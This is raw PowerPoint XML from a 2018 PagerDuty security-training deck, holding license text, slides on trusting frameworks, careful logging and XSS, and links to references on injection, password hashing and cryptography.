Target="https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_sql_and_nosql_injection.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.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hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographic_hash_function" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographic_hash_function" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://project-rainbowcrack.com/table.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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eg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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10.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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hyperlink" Target="https://en.wikipedia.org/wiki/Salt_(cryptography)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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hyperlink" Target="https://en.wikipedia.org/wiki/Salt_(cryptography)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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hyperlink" Target="https://en.wikipedia.org/wiki/Salt_(cryptography)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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23.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24.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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1.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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1.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Pepper_(cryptography)" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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2.jpeg"/><Relationship Id="rId4"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hyperlink" Target="https://en.wikipedia.org/wiki/Key_stretching" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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2.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2.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3.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tarsnap.com/scrypt/scrypt.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.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en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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5.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xkcd.com/257/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.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16.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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17.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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8.jpeg"/><Relationship Id="rId4"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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.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2.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hyperlink" Target="https://aws.amazon.com/blogs/security/tag/server-side-encryption/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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www.networksorcery.com/enp/data/encryption.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Guide_to_Cryptography" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/tqbf/be58d2d39690c3b366ad" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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9.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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hyperlink" Target="https://www.cvedetails.com/vulnerability-list/vendor_id-12043/product_id-22568/Rubyonrails-Ruby-On-Rails.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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34.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.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2.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2.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2.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image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.gif"/></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37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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138"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39" name="This material is  is licensed under the Apache License 2.0."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840307" y="398591"/>
            <a:ext cx="22703386" cy="4643439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This material is  is licensed under the Apache License 2.0.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Copyright 2018 PagerDuty, Inc."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840307" y="4536281"/>
            <a:ext cx="22703386" cy="464343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defTabSz="457200">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="22C864"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Copyright 2018 PagerDuty, Inc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="In plain English that means you can modify this presentation and use it both commercially and for private use. However, you must include any original copyright notices and license information.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046872" y="8394340"/>
            <a:ext cx="18484265" cy="3800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457200">
              <a:lnSpc>
                <a:spcPts val="6700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="4050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>In plain English that means you can modify this presentation and use it both commercially and for private use. However, you must include any original copyright notices and license information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="4050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6700"/>
              </a:lnSpc>
              <a:defRPr i="1" sz="4050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>So basically, don't remove this slide from the file (you don't have to present it though), and attribute PagerDuty if you make modifications.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="See speaker notes for full license text."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2852863" y="4256361"/>
            <a:ext cx="18484265" cy="80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lnSpc>
                <a:spcPts val="7100"/>
              </a:lnSpc>
              <a:defRPr sz="4350">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>See speaker notes for full license text.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6" name="trust.jpg" descr="trust.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:srcRect l="11461" t="11461" r="11461" b="11461"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-21233" y="-449968"/>
            <a:ext cx="24426335" cy="14311136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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298"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99" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Don’t trust frameworks blindly, make sure you understand the underlying principles."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840307" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="821531">
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Don’t trust frameworks blindly, make sure you understand the underlying principles.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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98"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39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400" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1401" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1402" name="Be mindful of what you log."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Be mindful of what you log.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1403" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="And do any sanitizing/redacting before the log is written to disk or uploaded to Splunk."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434779" y="7663129"/>
            <a:ext cx="17514442" cy="688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3600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>And do any sanitizing/redacting </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:t> the log is written to disk or uploaded to Splunk.</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8" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1409" name="https://gist.github.com/maxvt/bb49a6c7243163b8120625fc8ae3f3cd"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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https://gist.github.com/maxvt/bb49a6c7243163b8120625fc8ae3f3cd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1410"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141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412" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1414" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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8" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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41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420" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1421" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1422" name="XSS"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1423" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7613610" y="3343539"/>
            <a:ext cx="15547976" cy="7773989"/>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7" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="15000"/>
            <a:extLst/>
          </a:blip>
          <a:srcRect l="7847" t="4978" r="9498" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611922" y="806432"/>
            <a:ext cx="16055834" cy="13951784"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21528" h="21595" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="10978" y="1"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10486" y="7"/>
                  <a:pt x="10010" y="96"/>
                  <a:pt x="9666" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9547" y="325"/>
                  <a:pt x="9445" y="366"/>
                  <a:pt x="9437" y="358"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9430" y="349"/>
                  <a:pt x="9405" y="362"/>
                  <a:pt x="9381" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9358" y="410"/>
                  <a:pt x="9258" y="484"/>
                  <a:pt x="9160" y="549"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9062" y="615"/>
                  <a:pt x="8917" y="734"/>
                  <a:pt x="8836" y="814"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8756" y="894"/>
                  <a:pt x="8690" y="950"/>
                  <a:pt x="8690" y="938"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8690" y="927"/>
                  <a:pt x="8673" y="934"/>
                  <a:pt x="8652" y="954"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8631" y="973"/>
                  <a:pt x="8619" y="999"/>
                  <a:pt x="8625" y="1009"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8630" y="1020"/>
                  <a:pt x="8578" y="1114"/>
                  <a:pt x="8507" y="1219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8437" y="1323"/>
                  <a:pt x="8333" y="1501"/>
                  <a:pt x="8276" y="1614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8219" y="1728"/>
                  <a:pt x="8155" y="1843"/>
                  <a:pt x="8134" y="1871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8114" y="1900"/>
                  <a:pt x="8104" y="1923"/>
                  <a:pt x="8112" y="1923"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8120" y="1923"/>
                  <a:pt x="8089" y="2018"/>
                  <a:pt x="8043" y="2135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7997" y="2252"/>
                  <a:pt x="7935" y="2447"/>
                  <a:pt x="7906" y="2568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7824" y="2909"/>
                  <a:pt x="7622" y="3955"/>
                  <a:pt x="7617" y="4066"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7616" y="4090"/>
                  <a:pt x="7601" y="4209"/>
                  <a:pt x="7583" y="4330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7565" y="4451"/>
                  <a:pt x="7542" y="4656"/>
                  <a:pt x="7533" y="4785"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7514" y="5040"/>
                  <a:pt x="7583" y="7556"/>
                  <a:pt x="7623" y="8059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7636" y="8228"/>
                  <a:pt x="7659" y="8526"/>
                  <a:pt x="7673" y="8720"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7735" y="9554"/>
                  <a:pt x="7833" y="10464"/>
                  <a:pt x="7878" y="10626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7897" y="10693"/>
                  <a:pt x="7892" y="10723"/>
                  <a:pt x="7859" y="10765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7836" y="10795"/>
                  <a:pt x="7801" y="10819"/>
                  <a:pt x="7782" y="10819"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7762" y="10819"/>
                  <a:pt x="7752" y="10831"/>
                  <a:pt x="7760" y="10845"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
